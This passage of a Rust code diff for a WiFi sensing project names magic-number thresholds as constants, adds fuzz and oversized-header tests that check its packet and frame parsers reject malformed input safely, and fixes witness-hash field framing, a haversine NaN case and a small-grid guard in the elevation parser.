pub const ANOMALY_LABEL_CUTOFF: f32 = 0.5;
|
||||
|
||||
/// Which biological signal a specialist estimates.
|
||||
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
|
||||
pub enum SpecialistKind {
|
||||
@@ -229,7 +251,7 @@ impl Specialist for BreathingSpecialist {
|
||||
let min = if self.min_score > 0.0 {
|
||||
self.min_score
|
||||
} else {
|
||||
0.25
|
||||
DEFAULT_BREATHING_MIN_SCORE
|
||||
};
|
||||
if f.breathing_score < min || f.breathing_hz <= 0.0 {
|
||||
return None;
|
||||
@@ -258,7 +280,7 @@ impl Specialist for HeartbeatSpecialist {
|
||||
let min = if self.min_score > 0.0 {
|
||||
self.min_score
|
||||
} else {
|
||||
0.3
|
||||
DEFAULT_HEARTBEAT_MIN_SCORE
|
||||
};
|
||||
if f.heart_score < min || f.heart_hz <= 0.0 {
|
||||
return None;
|
||||
@@ -383,13 +405,13 @@ impl Specialist for AnomalySpecialist {
|
||||
.sqrt();
|
||||
best = best.min(d);
|
||||
}
|
||||
// >2× the typical spread → anomalous.
|
||||
let score = (best / (2.0 * self.scale)).clamp(0.0, 1.0);
|
||||
// Beyond ANOMALY_OUTLIER_SPREADS× the typical spread → fully anomalous.
|
||||
let score = (best / (ANOMALY_OUTLIER_SPREADS * self.scale)).clamp(0.0, 1.0);
|
||||
Some(SpecialistReading {
|
||||
kind: SpecialistKind::Anomaly,
|
||||
value: score,
|
||||
confidence: 0.6,
|
||||
label: Some(if score > 0.5 { "anomalous" } else { "normal" }.into()),
|
||||
label: Some(if score > ANOMALY_LABEL_CUTOFF { "anomalous" } else { "normal" }.into()),
|
||||
})
|
||||
}
|
||||
}
|
||||
@@ -505,6 +527,32 @@ mod tests {
|
||||
assert!(b.infer(&feat(5.0, 0.2, 0.3, 0.1)).is_none()); // low score → none
|
||||
}
|
||||
|
||||
/// De-magic pin: the named default min-scores must equal the historical
|
||||
/// literal values, and the gate boundary must be `score >= min` (a window
|
||||
/// exactly at the default floor reports; a hair below does not).
|
||||
#[test]
|
||||
fn default_min_score_constants_match_prior_literals() {
|
||||
assert_eq!(DEFAULT_BREATHING_MIN_SCORE, 0.25);
|
||||
assert_eq!(DEFAULT_HEARTBEAT_MIN_SCORE, 0.3);
|
||||
let b = BreathingSpecialist::default(); // min_score = 0.0 → uses default
|
||||
assert!(
|
||||
b.infer(&feat(5.0, 0.2, 0.3, DEFAULT_BREATHING_MIN_SCORE)).is_some(),
|
||||
"score exactly at the default floor must report"
|
||||
);
|
||||
assert!(
|
||||
b.infer(&feat(5.0, 0.2, 0.3, DEFAULT_BREATHING_MIN_SCORE - 1e-3)).is_none(),
|
||||
"score below the default floor must not report"
|
||||
);
|
||||
}
|
||||
|
||||
/// De-magic pin for the anomaly score scale + label cutoff (value-identical
|
||||
/// to the prior `2.0 * scale` / `> 0.5` literals).
|
||||
#[test]
|
||||
fn anomaly_constants_match_prior_literals() {
|
||||
assert_eq!(ANOMALY_OUTLIER_SPREADS, 2.0);
|
||||
assert_eq!(ANOMALY_LABEL_CUTOFF, 0.5);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn restlessness_normalizes() {
|
||||
let anchors = vec![
|
||||
|
||||
@@ -471,6 +471,54 @@ mod tests {
|
||||
assert!(ht.record(&f).is_err());
|
||||
}
|
||||
|
||||
/// Security pin (review 2026-06, ADR-127): the UDP parser is the CLI's
|
||||
/// widest attack surface — `calibrate` / `enroll` / `room-watch` bind it to
|
||||
/// 0.0.0.0 by default, so any host on the LAN can send arbitrary bytes. A
|
||||
/// header that *claims* a huge `n_antennas * n_subcarriers` must be rejected
|
||||
/// by the length check BEFORE the `Array2::zeros` allocation, so a single
|
||||
/// small datagram can never trigger a multi-MB allocation (unbounded-memory
|
||||
/// DoS). The largest possible claim (255 × 65535 pairs ≈ 33 MB of IQ) inside
|
||||
/// a RECV_BUF-sized (2048-byte) datagram parses to `None`, never OOMs.
|
||||
#[test]
|
||||
fn test_parse_csi_packet_oversized_claim_is_rejected_not_allocated() {
|
||||
let mut buf = vec![0u8; RECV_BUF];
|
||||
buf[0..4].copy_from_slice(&0xC511_0001u32.to_le_bytes());
|
||||
buf[4] = 1; // node_id
|
||||
buf[5] = 255; // n_antennas (max)
|
||||
buf[6..8].copy_from_slice(&65535u16.to_le_bytes()); // n_subcarriers (max)
|
||||
buf[8..12].copy_from_slice(&2432u32.to_le_bytes());
|
||||
// n_pairs = 255 * 65535 = 16_711_425 → needs ~33 MB of IQ bytes that a
|
||||
// 2048-byte datagram cannot carry → length check fails → None.
|
||||
assert!(parse_csi_packet(&buf, "ht20").is_none());
|
||||
}
|
||||
|
||||
/// Security pin (review 2026-06): the parser must never panic on ANY byte
|
||||
/// string — truncated headers, lying length fields, odd sizes. IQ-loop
|
||||
/// indexing is guarded by the length check; this sweeps a spread of
|
||||
/// adversarial inputs to lock in panic-on-adversarial-input = 0.
|
||||
#[test]
|
||||
fn test_parse_csi_packet_never_panics_on_arbitrary_bytes() {
|
||||
let mut st = 0x1234_5678u64;
|
||||
let mut next = move || {
|
||||
st = st
|
||||
.wrapping_mul(6_364_136_223_846_793_005)
|
||||
.wrapping_add(1_442_695_040_888_963_407);
|
||||
(st >> 33) as u8
|
||||
};
|
||||
for len in 0..600usize {
|
||||
let buf: Vec<u8> = (0..len).map(|_| next()).collect();
|
||||
for tier in ["ht20", "he20", "garbage"] {
|
||||
let _ = parse_csi_packet(&buf, tier);
|
||||
}
|
||||
}
|
||||
// Valid magic, lying n_subcarriers, no payload → None (not a panic).
|
||||
let mut buf = vec![0u8; 20];
|
||||
buf[0..4].copy_from_slice(&0xC511_0001u32.to_le_bytes());
|
||||
buf[5] = 3;
|
||||
buf[6..8].copy_from_slice(&500u16.to_le_bytes());
|
||||
assert!(parse_csi_packet(&buf, "ht20").is_none());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_freq_to_channel_24ghz() {
|
||||
assert_eq!(freq_mhz_to_channel(2437), 6);
|
||||
|
||||
@@ -1636,6 +1636,67 @@ mod tests {
|
||||
}
|
||||
}
|
||||
|
||||
/// Security pin (review 2026-06, ADR-127) — `from_canonical_bytes` is a
|
||||
/// deserialisation boundary for replayed/forwarded captures. A forged header
|
||||
/// advertising an enormous `rows × cols` must be rejected by the
|
||||
/// shape-vs-length check (`expect` uses saturating multiplies) BEFORE the
|
||||
/// `Vec::with_capacity(rows * cols)` allocation — otherwise an attacker could
|
||||
/// drive a multi-GB allocation from a few header bytes (unbounded-memory
|
||||
/// DoS). The check guarantees `rows*cols*16 <= bytes.len()`, so the capacity
|
||||
/// is bounded by the input the caller already holds. This must not OOM.
|
||||
#[test]
|
||||
fn canonical_decode_oversized_shape_is_bounded_not_allocated() {
|
||||
use ndarray::Array2;
|
||||
let meta = CsiMetadata::new(DeviceId::new("n"), FrequencyBand::Band2_4GHz, 1);
|
||||
let data = Array2::from_shape_fn((1, 2), |(_, c)| Complex64::new(c as f64, 0.0));
|
||||
let mut bytes = CsiFrame::new(meta, data).to_canonical_bytes();
|
||||
|
||||
// The (rows, cols) u32 pair is the last 8 bytes before the payload.
|
||||
// Overwrite with a maximal claim (u32::MAX × u32::MAX) and lop off the
|
||||
// payload so the buffer is tiny but the header lies enormously.
|
||||
let shape_off = bytes.len() - 8 - 2 * 16; // 2 samples × 16 bytes payload
|
||||
bytes[shape_off..shape_off + 4].copy_from_slice(&u32::MAX.to_le_bytes());
|
||||
bytes[shape_off + 4..shape_off + 8].copy_from_slice(&u32::MAX.to_le_bytes());
|
||||
bytes.truncate(shape_off + 8); // drop the real payload
|
||||
|
||||
// expect = MAX*MAX*16 (saturated) > found → PayloadMismatch, no alloc.
|
||||
assert!(matches!(
|
||||
CsiFrame::from_canonical_bytes(&bytes),
|
||||
Err(CanonicalDecodeError::PayloadMismatch { .. })
|
||||
));
|
||||
}
|
||||
|
||||
/// Security pin (review 2026-06) — the decoder must never panic on arbitrary
|
||||
/// bytes: every malformed input is a typed `CanonicalDecodeError`, never an
|
||||
/// unwinding panic (panic-on-adversarial-input = 0). Sweep truncations and a
|
||||
/// deterministic fuzz spread.
|
||||
#[test]
|
||||
fn canonical_decode_never_panics_on_arbitrary_bytes() {
|
||||
use ndarray::Array2;
|
||||
let mut meta = CsiMetadata::new(DeviceId::new("node"), FrequencyBand::Band5GHz, 36);
|
||||
meta.antenna_config.spacing_mm = Some(50.0);
|
||||
let data = Array2::from_shape_fn((2, 8), |(r, c)| Complex64::new(r as f64, c as f64));
|
||||
let good = CsiFrame::new(meta, data).to_canonical_bytes();
|
||||
|
||||
// Every prefix of a valid encoding must decode without panicking.
|
||||
for n in 0..good.len() {
|
||||
let _ = CsiFrame::from_canonical_bytes(&good[..n]);
|
||||
}
|
||||
// Deterministic LCG fuzz over varied lengths.
|
||||
let mut st = 0xDEAD_BEEFu64;
|
||||
for len in 0..400usize {
|
||||
let buf: Vec<u8> = (0..len)
|
||||
.map(|_| {
|
||||
st = st
|
||||
.wrapping_mul(6_364_136_223_846_793_005)
|
||||
.wrapping_add(1_442_695_040_888_963_407);
|
||||
(st >> 33) as u8
|
||||
})
|
||||
.collect();
|
||||
let _ = CsiFrame::from_canonical_bytes(&buf);
|
||||
}
|
||||
}
|
||||
|
||||
/// AC8c (review finding 7) — `Some(Uuid::nil())` calibration is an
|
||||
/// encoding error: nil is the wire sentinel for `None`, so encoding it
|
||||
/// would alias two distinct frames to one byte string (and one witness).
|
||||
|
||||
@@ -205,7 +205,7 @@ impl StreamingEngine {
|
||||
pub fn new(mode: PrivacyMode, model_version: u16, registration: GeoRegistration) -> Self {
|
||||
Self {
|
||||
fuser: MultistaticFuser::with_config(MultistaticConfig::default()),
|
||||
coherence_accept: 0.85,
|
||||
coherence_accept: Self::DEFAULT_COHERENCE_ACCEPT,
|
||||
privacy: PrivacyModeRegistry::new(mode),
|
||||
world: WorldGraph::new(registration),
|
||||
model_version,
|
||||
@@ -213,7 +213,11 @@ impl StreamingEngine {
|
||||
array: ArrayCoordinator::new(ArrayCoordinatorConfig::default()),
|
||||
node_geom: BTreeMap::new(),
|
||||
evolution: None,
|
||||
slam: RfSlam::with_discovery(0.5, 5, 0.6),
|
||||
slam: RfSlam::with_discovery(
|
||||
Self::SLAM_ASSOC_RADIUS_M,
|
||||
Self::SLAM_MIN_SIGHTINGS,
|
||||
Self::SLAM_MIN_COHERENCE,
|
||||
),
|
||||
person_tracks: BTreeMap::new(),
|
||||
semantic_retention: Self::DEFAULT_SEMANTIC_RETENTION,
|
||||
adapter: None,
|
||||
@@ -257,6 +261,31 @@ impl StreamingEngine {
|
||||
/// durable history belongs to the recorder).
|
||||
pub const DEFAULT_SEMANTIC_RETENTION: usize = 7_200;
|
||||
|
||||
/// Cross-node coherence at or above which fusion records a positive
|
||||
/// `CoherenceGateThreshold` evidence ref (ADR-137). Below it the cycle still
|
||||
/// emits, but without that corroborating evidence — so this gate shapes the
|
||||
/// trust record, not the privacy class. (== prior inline 0.85.)
|
||||
pub const DEFAULT_COHERENCE_ACCEPT: f32 = 0.85;
|
||||
|
||||
/// ADR-143 reflector-discovery parameters used to build the persistent
|
||||
/// `RfSlam`: association radius (m) within which two sightings are the same
|
||||
/// reflector, the minimum number of sightings before a reflector is
|
||||
/// considered stable, and the minimum per-sighting coherence to admit it.
|
||||
/// (== prior inline `with_discovery(0.5, 5, 0.6)`.)
|
||||
pub const SLAM_ASSOC_RADIUS_M: f64 = 0.5;
|
||||
/// Minimum sightings before a discovered reflector is treated as stable.
|
||||
pub const SLAM_MIN_SIGHTINGS: u64 = 5;
|
||||
/// Minimum per-sighting coherence to admit a reflector sighting.
|
||||
pub const SLAM_MIN_COHERENCE: f32 = 0.6;
|
||||
|
||||
/// ADR-143 static-anchor classification thresholds passed to
|
||||
/// `RfSlam::static_anchors`: the wall/ceiling stationarity ceiling and the
|
||||
/// mobile-reflector floor (anchors more mobile than this are dropped, not
|
||||
/// persisted). (== prior inline `static_anchors(0.05, 1.0)`.)
|
||||
pub const ANCHOR_WALL_CEILING: f64 = 0.05;
|
||||
/// Mobility floor above which a reflector is treated as mobile (skipped).
|
||||
pub const ANCHOR_MOBILE_FLOOR: f64 = 1.0;
|
||||
|
||||
/// Override the `SemanticState` retention cap (minimum 1).
|
||||
pub fn set_semantic_retention(&mut self, max_states: usize) {
|
||||
self.semantic_retention = max_states.max(1);
|
||||
@@ -331,7 +360,9 @@ impl StreamingEngine {
|
||||
self.slam.observe(obs);
|
||||
}
|
||||
let mut written = Vec::new();
|
||||
for (pos, class) in self.slam.static_anchors(0.05, 1.0) {
|
||||
for (pos, class) in
|
||||
self.slam.static_anchors(Self::ANCHOR_WALL_CEILING, Self::ANCHOR_MOBILE_FLOOR)
|
||||
{
|
||||
let kind = match class {
|
||||
wifi_densepose_signal::ruvsense::ReflectorClass::Wall => AnchorKind::Reflector,
|
||||
wifi_densepose_signal::ruvsense::ReflectorClass::Furniture => AnchorKind::Furniture,
|
||||
@@ -595,19 +626,46 @@ impl StreamingEngine {
|
||||
}
|
||||
}
|
||||
|
||||
/// Domain-separation tag for the witness hash. Bumping this string
|
||||
/// intentionally invalidates every previously-recorded witness (a schema break).
|
||||
const WITNESS_DOMAIN: &[u8] = b"ruview.engine.witness.v1";
|
||||
|
||||
/// Length-prefix a variable-length field into the witness hash so adjacent
|
||||
/// fields can never be confused for one another. The 8-byte little-endian
|
||||
/// length makes the field framing unambiguous regardless of the bytes inside
|
||||
/// it (a field can contain the separator, the domain tag, anything).
|
||||
fn witness_field(h: &mut blake3::Hasher, bytes: &[u8]) {
|
||||
h.update(&(bytes.len() as u64).to_le_bytes());
|
||||
h.update(bytes);
|
||||
}
|
||||
|
||||
/// Deterministic BLAKE3 witness over a trust decision: the provenance tuple
|
||||
/// (evidence ‖ model ‖ calibration ‖ privacy decision) plus the effective
|
||||
/// privacy-class byte. Stable across runs for identical decisions — the
|
||||
/// "signed operational belief" fingerprint (ADR-137 §2.7 / ADR-028).
|
||||
///
|
||||
/// # Witness integrity (review finding: domain separation)
|
||||
/// Every privacy-relevant field is **length-prefixed** before hashing, and the
|
||||
/// (variable-length) evidence list is preceded by an explicit count. Without
|
||||
/// this framing the fields were concatenated boundary-to-boundary, so a string
|
||||
/// straddling a field boundary (e.g. an adapter id absorbing the leading bytes
|
||||
/// of the calibration epoch, or a model_version absorbing a trailing evidence
|
||||
/// ref) collided with a *different* trust decision — silently un-distinguishing
|
||||
/// two distinct privacy-relevant inputs and defeating the tamper/drift audit.
|
||||
/// `model_version` is operator-influenceable (per-room adapter id, ADR-150
|
||||
/// §3.4), so the ambiguity was reachable, not merely theoretical.
|
||||
fn witness_of(p: &SemanticProvenance, class: PrivacyClass) -> [u8; 32] {
|
||||
let mut h = blake3::Hasher::new();
|
||||
h.update(WITNESS_DOMAIN);
|
||||
// Explicit evidence count, then each ref length-prefixed: the number of
|
||||
// evidence refs is itself privacy-relevant and must be unambiguous.
|
||||
h.update(&(p.evidence.len() as u64).to_le_bytes());
|
||||
for e in &p.evidence {
|
||||
h.update(e.as_bytes());
|
||||
h.update(b"\x1f");
|
||||
witness_field(&mut h, e.as_bytes());
|
||||
}
|
||||
h.update(p.model_version.as_bytes());
|
||||
h.update(p.calibration_version.as_bytes());
|
||||
h.update(p.privacy_decision.as_bytes());
|
||||
witness_field(&mut h, p.model_version.as_bytes());
|
||||
witness_field(&mut h, p.calibration_version.as_bytes());
|
||||
witness_field(&mut h, p.privacy_decision.as_bytes());
|
||||
h.update(&[class.as_u8()]);
|
||||
*h.finalize().as_bytes()
|
||||
}
|
||||
@@ -1113,4 +1171,179 @@ mod tests {
|
||||
// StrictNoIdentity base = Restricted, even with no contradiction.
|
||||
assert_eq!(out.effective_class, PrivacyClass::Restricted);
|
||||
}
|
||||
|
||||
/// De-magic pin (review finding): the named engine constants must keep
|
||||
/// their prior inline values exactly, so the de-magic is a pure rename with
|
||||
/// no behavior change.
|
||||
#[test]
|
||||
fn engine_constants_match_prior_values() {
|
||||
assert_eq!(StreamingEngine::DEFAULT_COHERENCE_ACCEPT, 0.85);
|
||||
assert_eq!(StreamingEngine::SLAM_ASSOC_RADIUS_M, 0.5);
|
||||
assert_eq!(StreamingEngine::SLAM_MIN_SIGHTINGS, 5);
|
||||
assert_eq!(StreamingEngine::SLAM_MIN_COHERENCE, 0.6);
|
||||
assert_eq!(StreamingEngine::ANCHOR_WALL_CEILING, 0.05);
|
||||
assert_eq!(StreamingEngine::ANCHOR_MOBILE_FLOOR, 1.0);
|
||||
}
|
||||
|
||||
/// Privacy monotonicity (the crux): across EVERY base mode, a forced
|
||||
/// contradiction may only ever make the emitted class *more* restrictive
|
||||
/// (higher byte) and never less. Demotion is single-step and clamps at
|
||||
/// Restricted; a clean cycle emits exactly the base class. This is the
|
||||
/// information-only-removed invariant of ADR-141/120 stated as a property
|
||||
/// over the whole mode set.
|
||||
#[test]
|
||||
fn forced_contradiction_never_relaxes_class() {
|
||||
let cal_mismatch = [Some(CalibrationId(1)), Some(CalibrationId(2))]; // disagree → contradiction
|
||||
let cal_match = [Some(CalibrationId(5)), Some(CalibrationId(5))];
|
||||
let frames = [node_frame(0, 1000, 56), node_frame(1, 1001, 56)];
|
||||
for mode in [
|
||||
PrivacyMode::RawResearch,
|
||||
PrivacyMode::PrivateHome,
|
||||
PrivacyMode::EnterpriseAnonymous,
|
||||
PrivacyMode::CareWithConsent,
|
||||
PrivacyMode::StrictNoIdentity,
|
||||
] {
|
||||
let base_class = mode.target_class();
|
||||
|
||||
// Clean cycle: emits exactly the base class (no relaxation upward).
|
||||
let mut clean = StreamingEngine::new(mode, 1, GeoRegistration::default());
|
||||
let room_c = clean.add_room("r", "R");
|
||||
let oc = clean
|
||||
.process_cycle_calibrated(&frames, &cal_match, room_c, 1)
|
||||
.unwrap();
|
||||
assert_eq!(oc.effective_class, base_class, "clean cycle == base class");
|
||||
assert!(!oc.demoted);
|
||||
|
||||
// Forced contradiction: class byte only ever increases (more
|
||||
// restrictive), never decreases below the base.
|
||||
let mut dirty = StreamingEngine::new(mode, 1, GeoRegistration::default());
|
||||
let room_d = dirty.add_room("r", "R");
|
||||
let od = dirty
|
||||
.process_cycle_calibrated(&frames, &cal_mismatch, room_d, 1)
|
||||
.unwrap();
|
||||
assert!(od.demoted, "calibration mismatch must demote in {mode:?}");
|
||||
assert!(
|
||||
od.effective_class.as_u8() >= base_class.as_u8(),
|
||||
"demotion must never relax: {mode:?} base={:?} got={:?}",
|
||||
base_class,
|
||||
od.effective_class
|
||||
);
|
||||
// And it must be strictly more restrictive unless already clamped
|
||||
// at the most-restrictive class.
|
||||
if base_class != PrivacyClass::Restricted {
|
||||
assert!(
|
||||
od.effective_class.as_u8() > base_class.as_u8(),
|
||||
"unclamped demotion must increase restriction in {mode:?}"
|
||||
);
|
||||
} else {
|
||||
assert_eq!(od.effective_class, PrivacyClass::Restricted);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Fail-closed boundary: an empty cycle (zero frames) must NOT emit a
|
||||
/// trusted output at all — fusion rejects it and the engine surfaces a
|
||||
/// hard error. There is no degenerate output that could carry a stale or
|
||||
/// over-permissive class.
|
||||
#[test]
|
||||
fn empty_cycle_fails_closed() {
|
||||
let (mut e, room) = engine();
|
||||
let err = e.process_cycle(&[], CalibrationId(1), room, 1);
|
||||
assert!(matches!(err, Err(EngineError::Fusion(_))), "empty cycle must error, got {err:?}");
|
||||
// No SemanticState was appended (room + sensor only).
|
||||
assert_eq!(e.world().node_count(), 2);
|
||||
assert_eq!(e.cycle_count(), 0, "a failed cycle must not advance the counter");
|
||||
}
|
||||
|
||||
/// Single-node boundary characterization: a one-node cycle fuses (no
|
||||
/// multistatic cross-check is possible), reports no mesh (n<2), and emits a
|
||||
/// well-formed witness at the base class. Documents that single-node sensing
|
||||
/// is a valid, non-demoting mode — not a silent bypass.
|
||||
#[test]
|
||||
fn single_node_cycle_is_well_formed() {
|
||||
let (mut e, room) = engine();
|
||||
let out = e
|
||||
.process_cycle(&[node_frame(0, 1000, 56)], CalibrationId(1), room, 1)
|
||||
.unwrap();
|
||||
assert!(out.mesh.is_none(), "one node has no mesh cut");
|
||||
assert!(out.directional.is_none(), "no geometry registered");
|
||||
assert_eq!(out.effective_class, PrivacyClass::Anonymous); // PrivateHome base
|
||||
assert_ne!(out.witness, [0u8; 32], "witness still emitted");
|
||||
}
|
||||
|
||||
/// Witness domain-separation (review finding): the witness must change
|
||||
/// whenever ANY privacy-relevant field changes. The model_version,
|
||||
/// calibration_version, and privacy_decision fields are concatenated into
|
||||
/// the hash; without an unambiguous delimiter between them, a string that
|
||||
/// straddles the model/calibration boundary collides with a different
|
||||
/// (model, calibration) tuple.
|
||||
///
|
||||
/// `model_version` is operator-influenceable through the per-room adapter id
|
||||
/// (ADR-150 §3.4), and `calibration_version` is `cal:<hex>` — so the two
|
||||
/// provenances below are *both reachable* and represent genuinely different
|
||||
/// trust decisions (different model identity, different calibration epoch),
|
||||
/// yet the field-boundary ambiguity makes them hash-collide. A colliding
|
||||
/// witness silently un-distinguishes two distinct privacy-relevant inputs,
|
||||
/// defeating the tamper/drift audit guarantee.
|
||||
#[test]
|
||||
fn witness_distinguishes_model_calibration_boundary() {
|
||||
let class = PrivacyClass::Anonymous;
|
||||
// A: model "rfenc-v1+adapter:X", calibration epoch "cal:00ab".
|
||||
let a = SemanticProvenance {
|
||||
evidence: vec!["ev".into()],
|
||||
model_version: "rfenc-v1+adapter:X".into(),
|
||||
calibration_version: "cal:00ab".into(),
|
||||
privacy_decision: "PrivateHome/Anonymous".into(),
|
||||
};
|
||||
// B: adapter id absorbs the leading "cal:00a" of A's calibration; B's
|
||||
// own calibration is the remaining "b". A.model‖A.cal == B.model‖B.cal,
|
||||
// so the unseparated concatenation hashes identically — yet these are
|
||||
// distinct (model identity, calibration epoch) tuples.
|
||||
let b = SemanticProvenance {
|
||||
evidence: vec!["ev".into()],
|
||||
model_version: "rfenc-v1+adapter:Xcal:00a".into(),
|
||||
calibration_version: "b".into(),
|
||||
privacy_decision: "PrivateHome/Anonymous".into(),
|
||||
};
|
||||
assert_ne!(a.model_version, b.model_version);
|
||||
assert_ne!(a.calibration_version, b.calibration_version);
|
||||
// Sanity: the two collide under naive concatenation.
|
||||
assert_eq!(
|
||||
format!("{}{}", a.model_version, a.calibration_version),
|
||||
format!("{}{}", b.model_version, b.calibration_version),
|
||||
);
|
||||
assert_ne!(
|
||||
witness_of(&a, class),
|
||||
witness_of(&b, class),
|
||||
"distinct (model, calibration) tuples must not share a witness"
|
||||
);
|
||||
}
|
||||
|
||||
/// Witness domain-separation across the evidence/model boundary: a witness
|
||||
/// must distinguish an extra evidence ref from a model_version that absorbs
|
||||
/// the same bytes. The evidence loop terminates each ref with one separator;
|
||||
/// the model field must itself be unambiguously delimited from the (variable
|
||||
/// number of) evidence refs that precede it.
|
||||
#[test]
|
||||
fn witness_distinguishes_evidence_model_boundary() {
|
||||
let class = PrivacyClass::Anonymous;
|
||||
let a = SemanticProvenance {
|
||||
evidence: vec!["e1".into(), "e2".into()],
|
||||
model_version: "m".into(),
|
||||
calibration_version: "cal:1".into(),
|
||||
privacy_decision: "PrivateHome/Anonymous".into(),
|
||||
};
|
||||
let b = SemanticProvenance {
|
||||
evidence: vec!["e1".into()],
|
||||
// absorbs "e2" + its 0x1f separator into the model field.
|
||||
model_version: "e2\u{1f}m".into(),
|
||||
calibration_version: "cal:1".into(),
|
||||
privacy_decision: "PrivateHome/Anonymous".into(),
|
||||
};
|
||||
assert_ne!(
|
||||
witness_of(&a, class),
|
||||
witness_of(&b, class),
|
||||
"an extra evidence ref must not collide with a model_version that absorbs it"
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
@@ -15,7 +15,11 @@ pub fn haversine(a: &GeoPoint, b: &GeoPoint) -> f64 {
|
||||
let lat1 = a.lat.to_radians();
|
||||
let lat2 = b.lat.to_radians();
|
||||
let h = (dlat / 2.0).sin().powi(2) + lat1.cos() * lat2.cos() * (dlon / 2.0).sin().powi(2);
|
||||
2.0 * WGS84_A * h.sqrt().asin()
|
||||
// `asin` is only defined on [-1, 1]. For (near-)antipodal points floating
|
||||
// rounding can push `h.sqrt()` to 1.0 + epsilon, and `asin(>1)` is NaN —
|
||||
// which would silently poison any distance-based comparison downstream.
|
||||
// Clamp into domain so the result is always a finite distance.
|
||||
2.0 * WGS84_A * h.sqrt().clamp(0.0, 1.0).asin()
|
||||
}
|
||||
|
||||
/// WGS84 to local ENU (East-North-Up) relative to origin, in meters.
|
||||
@@ -83,3 +87,73 @@ pub fn tiles_for_bbox(bbox: &GeoBBox, zoom: u8) -> Vec<TileCoord> {
|
||||
}
|
||||
tiles
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
// ── haversine asin-domain robustness ───────────────────────────────────
|
||||
//
|
||||
// For (near-)antipodal points, floating rounding can push the haversine
|
||||
// term `h` to 1.0 + ~4e-16, and `asin(sqrt(h)) = asin(>1)` is NaN. A NaN
|
||||
// distance silently breaks every downstream comparison (all `<`/`>` become
|
||||
// false), so the result must stay finite. This exact pair produced
|
||||
// h = 1.0000000000000004 pre-fix (verified empirically).
|
||||
|
||||
#[test]
|
||||
fn haversine_near_antipodal_is_finite_not_nan() {
|
||||
let a = GeoPoint {
|
||||
lat: -44.4994,
|
||||
lon: -178.957_22,
|
||||
alt: 0.0,
|
||||
};
|
||||
let b = GeoPoint {
|
||||
lat: 44.499_399_99,
|
||||
lon: 1.042_780_01,
|
||||
alt: 0.0,
|
||||
};
|
||||
let d = haversine(&a, &b);
|
||||
assert!(d.is_finite(), "near-antipodal haversine must be finite, got {d}");
|
||||
// Half-circumference is ~20_037 km; result must be close to that.
|
||||
assert!(
|
||||
(19_000_000.0..21_000_000.0).contains(&d),
|
||||
"antipodal distance should be ~half-circumference, got {d}"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn haversine_identical_points_is_zero() {
|
||||
let p = GeoPoint {
|
||||
lat: 43.65,
|
||||
lon: -79.38,
|
||||
alt: 0.0,
|
||||
};
|
||||
let d = haversine(&p, &p);
|
||||
assert!(d.is_finite() && d < 1e-6, "identical points → 0, got {d}");
|
||||
}
|
||||
|
||||
// ── pole-singularity robustness (degenerate geometry) ──────────────────
|
||||
//
|
||||
// The ENU transforms divide by cos(lat); at the poles cos(±90°) = 0, so
|
||||
// the longitude term is non-finite. We do not change the transform (that
|
||||
// would alter near-pole results), but we pin that the call does NOT panic.
|
||||
|
||||
#[test]
|
||||
fn wgs84_to_enu_at_pole_does_not_panic() {
|
||||
let origin = GeoPoint {
|
||||
lat: 90.0,
|
||||
lon: 0.0,
|
||||
alt: 0.0,
|
||||
};
|
||||
let point = GeoPoint {
|
||||
lat: 89.99,
|
||||
lon: 10.0,
|
||||
alt: 0.0,
|
||||
};
|
||||
// Must return without panicking. North/up stay finite; east may be
|
||||
// non-finite at the exact pole — assert the bounded components only.
|
||||
let enu = wgs84_to_enu(&point, &origin);
|
||||
assert!(enu[1].is_finite(), "north component must be finite");
|
||||
assert!(enu[2].is_finite(), "up component must be finite");
|
||||
}
|
||||
}
|
||||
|
||||
@@ -68,6 +68,21 @@ pub fn parse_hgt(data: &[u8], origin_lat: f64, origin_lon: f64) -> Result<Elevat
|
||||
let n_samples = data.len() / 2;
|
||||
let side = (n_samples as f64).sqrt() as usize;
|
||||
|
||||
// A valid SRTM grid is at least 2x2 — anything smaller has no cell spacing.
|
||||
// Without this guard, `side - 1` underflows (panic in debug, wraps to a
|
||||
// huge value in release) and `1.0 / (side - 1)` yields a garbage/inf
|
||||
// `cell_size_deg` that then poisons every `ElevationGrid::get` lookup. A
|
||||
// truncated download, a 404 HTML body, or an empty response can all reach
|
||||
// here, so fail loudly instead of corrupting the persisted grid.
|
||||
if side < 2 {
|
||||
anyhow::bail!(
|
||||
"HGT data too small: {} bytes ({} samples, side {}) — need at least a 2x2 grid",
|
||||
data.len(),
|
||||
n_samples,
|
||||
side
|
||||
);
|
||||
}
|
||||
|
||||
let heights: Vec<f32> = data
|
||||
.chunks_exact(2)
|
||||
.map(|c| {
|
||||
@@ -129,3 +144,42 @@ pub fn extract_subgrid(grid: &ElevationGrid, center: &GeoPoint, radius_m: f64) -
|
||||
heights,
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
// ── parse_hgt degenerate-input robustness ──────────────────────────────
|
||||
//
|
||||
// Before the `side < 2` guard, an empty or sub-2x2 buffer made
|
||||
// `1.0 / (side - 1)` underflow `side` (panic in debug / huge wrap in
|
||||
// release) and produce a garbage `cell_size_deg`. A truncated download or
|
||||
// a 404 HTML page reaches `parse_hgt`, so these must Err, not panic/poison.
|
||||
|
||||
#[test]
|
||||
fn parse_hgt_empty_data_errors_not_panics() {
|
||||
let res = parse_hgt(&[], 40.0, -75.0);
|
||||
assert!(res.is_err(), "empty HGT must Err, got {res:?}");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn parse_hgt_single_sample_errors() {
|
||||
// 2 bytes = 1 sample → side 1 → div-by-zero cell_size (inf) pre-fix.
|
||||
let res = parse_hgt(&[0u8, 0u8], 40.0, -75.0);
|
||||
assert!(res.is_err(), "1-sample HGT must Err, got {res:?}");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn parse_hgt_minimal_2x2_is_finite() {
|
||||
// 4 samples = 8 bytes → side 2 → cell_size = 1.0 (finite, valid).
|
||||
let data = vec![0u8; 8];
|
||||
let grid = parse_hgt(&data, 40.0, -75.0).expect("2x2 HGT should parse");
|
||||
assert_eq!(grid.cols, 2);
|
||||
